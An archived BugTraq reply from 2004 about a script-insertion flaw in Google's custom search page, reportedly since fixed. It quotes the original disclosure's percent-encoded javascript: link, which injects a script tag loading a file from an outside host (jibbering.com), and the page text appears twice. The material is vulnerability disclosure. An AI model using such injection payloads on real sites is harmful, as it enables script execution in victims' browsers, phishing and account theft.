BugTraq
Back to list
|
Post reply
Re: Google Script Insertion Exploit
Oct 23 2004 03:52PM
Jérôme ATHIAS (jerome athias caramail com)
In-Reply-To: <20041019163859.32238.qmail (at) www.securityfocus (dot) com [email concealed]>
>The exploit is easiest to produce through a custom google search form which
>are commonly seen, used and understood on the web, but you can also do it
>through a simple link, this one works in IE:
>
>http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a
%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e
%64%43%68%69%6c%64%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c
%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74
%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%74%65%73%74%32
%2e%6a%73%27
>
Good work.
Seems to be fixed:
http://news.netcraft.com/archives/2004/10/22/google_fix_second_phishing_
vulnerability.html
Regards,
Jerome ATHIAS
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
>The exploit is easiest to produce through a custom google search form which
>are commonly seen, used and understood on the web, but you can also do it
>through a simple link, this one works in IE:
>
>http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a
%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e
%64%43%68%69%6c%64%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c
%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74
%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%74%65%73%74%32
%2e%6a%73%27
>
Good work.
Seems to be fixed:
http://news.netcraft.com/archives/2004/10/22/google_fix_second_phishing_
vulnerability.html
Regards,
Jerome ATHIAS
[ reply ]